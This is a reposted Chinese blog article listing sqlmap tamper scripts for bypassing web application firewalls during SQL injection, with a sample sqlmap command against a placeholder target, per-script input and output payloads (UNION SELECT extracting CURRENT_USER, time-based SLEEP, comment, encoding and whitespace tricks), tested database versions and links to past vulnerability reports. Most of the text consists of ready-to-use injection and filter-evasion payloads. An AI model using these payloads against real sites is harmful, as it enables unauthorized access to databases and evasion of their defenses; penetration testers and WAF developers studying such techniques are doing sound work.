sqlmap注入之tamper绕过WAF防火墙过滤

转载 2018年04月15日 18:18:16

根据实际情况,可以同时使用多个脚本,使用-v参数可以看到payload的变化。

sqlmap的tamper绕过waf

sqlmap.py -u "http://www.target.com/test.php?id=12" --dbms mysql --tamper "space2commet,versionedmorekeywords.py"  -v 3 --dbs

脚本名:apostrophemask.py


作用:用utf8代替引号

1
Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

Tested against: all

脚本名:equaltolike.py


作用:like 代替等号

1
2
3
4
5
Example:
*   Input: SELECT FROM users WHERE id=1
*   OutputSELECT FROM users WHERE id LIKE 1

案例一: http://wooyun.org/bugs/wooyun-2010-087296

案例二: http://wooyun.org/bugs/wooyun-2010-074790

案例三:http://wooyun.org/bugs/wooyun-2010-072489

脚本名:space2dash.py


作用:绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)

1
Example: ('1 AND 9227=9227''1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'

Tested against: * MSSQL * SQLite

案例一:http://wooyun.org/bugs/wooyun-2010-062878

脚本名:greatest.py


作用:绕过过滤’>’ ,用GREATEST替换大于号。

1
Example: ('1 AND A > B''1 AND GREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

脚本名:space2hash.py


作用:空格替换为#号 随机字符串 以及换行符

1
2
3
4
Example:
*   Input: 1 AND 9227=9227
*   Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement:

  • MySQL Tested against:
  • MySQL 4.0, 5.0

脚本名:apostrophenullencode.py


作用:绕过过滤双引号,替换字符和双引号。

1
Example: tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271'

Tested against:

  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:halfversionedmorekeywords.py


作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论

1
2
3
Example:
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22

脚本名:space2morehash.py


作用:空格替换为 #号 以及更多随机字符串 换行符

1
2
3
4
5
Example:
* Input: 1 AND 9227=9227
Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

Requirement: * MySQL >= 5.1.13 Tested

against: * MySQL 5.1.41

案例一:91ri一篇文章

脚本名:appendnullbyte.py


作用:在有效负荷结束位置加载零字节字符编码

1
Example: ('1 AND 1=1''1 AND 1=1%00'

Requirement:

  • Microsoft Access

脚本名:ifnull2ifisnull.py


作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

1
2
3
Example:
('IFNULL(1, 2)''IF(ISNULL(1),2,1)'

Requirement:

  • MySQL
  • SQLite (possibly)
  • SAP MaxDB (possibly)

Tested against:

  • MySQL 5.0 and 5.5

脚本名:space2mssqlblank.py(mssql)


作用:空格替换为其它空符号

Example: * Input: SELECT id FROM users * Output: SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005

ASCII table:


案例一: wooyun.org/bugs/wooyun-2010-062878

脚本名:base64encode.py


作用:用base64编码替换 Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all

案例一: http://wooyun.org/bugs/wooyun-2010-060071

案例二: http://wooyun.org/bugs/wooyun-2010-021062

案例三: http://wooyun.org/bugs/wooyun-2010-043229

脚本名:space2mssqlhash.py


作用:替换空格

1
Example: ('1 AND 9227=9227''1%23%0AAND%23%0A9227=9227' Requirement: * MSSQL * MySQL

脚本名:modsecurityversioned.py


作用:过滤空格,包含完整的查询版本注释

1
Example: ('1 AND 2>1--''1 /*!30874AND 2>1*/--'

Requirement: * MySQL

Tested against:

  • MySQL 5.0

脚本名:space2mysqlblank.py


作用:空格替换其它空白符号(mysql)

1
2
3
4
5
Example:
* Input: SELECT id FROM users
OutputSELECT%0Bid%0BFROM%A0users

Requirement:

  • MySQL

Tested against:

  • MySQL 5.1

案例一:wooyun.org/bugs/wooyun-2010-076735

脚本名:between.py


作用:用between替换大于号(>)

1
Example: ('1 AND A > B--''1 AND A NOT BETWEEN 0 AND B--'

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-068815

脚本名:space2mysqldash.py


作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)

注:之前有个mssql的 这个是mysql的

1
Example: ('1 AND 9227=9227''1--%0AAND--%0A9227=9227'

Requirement:

  • MySQL
  • MSSQL

脚本名:multiplespaces.py


作用:围绕SQL关键字添加多个空格

1
Example: ('1 UNION SELECT foobar''1 UNION SELECT foobar'

Tested against: all

案例一: wooyun.org/bugs/wooyun-2010-072489

脚本名:space2plus.py


作用:用+替换空格

1
Example: ('SELECT id FROM users''SELECT+id+FROM+users' Tested against: all

脚本名:bluecoat.py


作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

1
Example: ('SELECT id FROM users where id = 1''SELECT%09id FROM users where id LIKE 1'

Tested against:

  • MySQL 5.1, SGOS

脚本名:nonrecursivereplacement.py


双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

1
Example: ('1 UNION SELECT 2--''1 UNIOUNIONN SELESELECTCT 2--' Tested against: all

脚本名:space2randomblank.py


作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

1
Example: ('SELECT id FROM users''SELECT%0Did%0DFROM%0Ausers'

Tested against: all

脚本名:sp_password.py


作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

1
Example: ('1 AND 9227=9227-- ''1 AND 9227=9227-- sp\_password' Requirement: * MSSQL

脚本名:chardoubleencode.py


作用: 双url编码(不处理以编码的)

1
2
3
4
5
Example:
* Input: SELECT FIELD FROM%20TABLE
Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

脚本名:unionalltounion.py


作用:替换UNION ALL SELECT UNION SELECT

Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

Requirement: all

脚本名:charencode.py


作用:url编码

1
2
3
4
5
Example:
*   Input: SELECT FIELD FROM%20TABLE
*   Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:randomcase.py


作用:随机大小写 Example:

  • Input: INSERT
  • Output: InsERt

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

脚本名:unmagicquotes.py


作用:宽字符绕过 GPC addslashes

1
2
3
4
5
Example:
* Input: 1′ AND 1=1
Output: 1%bf%27 AND 1=1–%20

脚本名:randomcomments.py


作用:用/**/分割sql关键字

1
2
3
Example:
INSERT’ becomes ‘IN//S//ERT’

脚本名:charunicodeencode.py


作用:字符串 unicode 编码

1
2
3
4
5
Example:
* Input: SELECT FIELD%20FROM TABLE
Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

  • ASP
  • ASP.NET

Tested against:

  • Microsoft SQL Server 2000
  • Microsoft SQL Server 2005
  • MySQL 5.1.56
  • PostgreSQL 9.0.3

案例一: wooyun.org/bugs/wooyun-2010-074261

脚本名:securesphere.py


作用:追加特制的字符串

1
Example: ('1 AND 1=1'"1 AND 1=1 and '0having'='0having'"

Tested against: all

脚本名:versionedmorekeywords.py


作用:注释绕过

1
2
3
4
5
Example:
* Input: 1 UNION ALL SELECT NULLNULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

  • MySQL >= 5.1.13

脚本名:space2comment.py


作用:Replaces space character (‘ ‘) with comments ‘/**/’

1
2
3
4
5
Example:
* Input: SELECT id FROM users
OutputSELECT//id//FROM/**/users

Tested against:

  • Microsoft SQL Server 2005
  • MySQL 4, 5.0 and 5.5
  • Oracle 10g
  • PostgreSQL 8.3, 8.4, 9.0

案例一:wooyun.org/bugs/wooyun-2010-046496

脚本名:halfversionedmorekeywords.py


作用:关键字前加注释

1
2
3
4
5
Example:
* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULLNULLAND‘QDWa’='QDWa
* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

Requirement:

  • MySQL < 5.1

Tested against:

  • MySQL 4.0.18, 5.0.22

注:本文来自 http://www.vuln.cn

sqlmap --tamper 绕过WAF脚本分类整理

支持的数据库 编号 脚本名称 作用 实现方式 all 1 apostrophemask.py 用utf8代替引号 ("1 AND '1'='1")  '1 AND %EF%BC%...
  • whatday
  • whatday
  • 2017-01-29 21:57:18
  • 4687

SQLMAP tamper WAF 绕过脚本列表注释

今天我就给大家出一个sqlmap注入过waf的方法集合网上的文章大多不全或者一篇盖过 正文: sqlmap的[url=]tamper[/url]目录下有41个用于绕过waf的脚本,...
  • wjy397
  • wjy397
  • 2016-11-22 16:18:36
  • 1067

SQLMAP --tamper 绕过WAF脚本分类整理

SQLMAP --tamper 绕过WAF脚本分类整理 支持的数据库 编号 脚本名称 作用 实现方式 ALL 1 apostrophemask.py 用utf8代替引号...
  • xing_anksh
  • xing_anksh
  • 2014-04-02 10:13:05
  • 16821

SQLMAP渗透笔记之绕过WAF防火墙

---------------------------------------------------------------------------------------------  ...
  • T780000063
  • T780000063
  • 2017-12-26 11:37:24
  • 608

深入理解SQL注入绕过WAF和过滤机制

知己知彼,百战不殆 --孙子兵法 [目录] 0x0 前言 0x1 WAF的常见特征 0x2 绕过WAF的方法 0x3 SQLi Filter的实现及Evasion 0x4 延伸及测试向量示...
  • whatday
  • whatday
  • 2017-03-13 09:14:55
  • 2323

利用Tamper绕过防注入代码进行注入(转自 i春秋 )

转载自:http://www.ichunqiu.com/course/38 实验环境 实验环境  操作机:Windows XP目标机:Windows 2003 目标网址:www...
  • C_Major
  • C_Major
  • 2015-06-09 18:43:08
  • 2161

使用sqlmap 绕过防火墙进行注入测试

0x00 前言    现在的网络环境往往是WAF/IPS/IDS保护着Web 服务器等等,这种保护措施往往会过滤挡住我们的SQL注入查询链接,甚至封锁我们的主机IP,所以这个时候,我们就要考虑怎样进行...
  • qq_29277155
  • qq_29277155
  • 2016-04-20 19:17:19
  • 20488

sqlmap 绕过防火墙的tamper脚本

sqlmap中的tamper脚本来对目标进行更高效的攻击。 由于乌云知识库少了sqlmap-tamper 收集一下,方便学习。 根据sqlmap中的tamper脚本可以学习过绕过一些技巧。 我收集在...
  • jiangliuzheng
  • jiangliuzheng
  • 2016-07-12 09:37:43
  • 1398

WAF自动化暴破(绕过)脚本xwaf

xwaf xwaf是一个python写的waf自动绕过工具,上一个版本是bypass_waf,xwaf相比bypass_waf更智能,可无人干预,自动暴破waf Disclaimer [!]...
  • qq_27446553
  • qq_27446553
  • 2017-02-23 16:15:49
  • 651

sqlmap之tamper绕过安全狗

每当注入的时候看到这个贱贱的提示框,内心有千万只草泥马在奔腾。 但很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,可...
  • m0_37438418
  • m0_37438418
  • 2018-03-08 22:26:48
  • 57
收藏助手
不良信息举报
您举报文章:sqlmap注入之tamper绕过WAF防火墙过滤
举报原因:
原因补充:

(最多只允许输入30个字)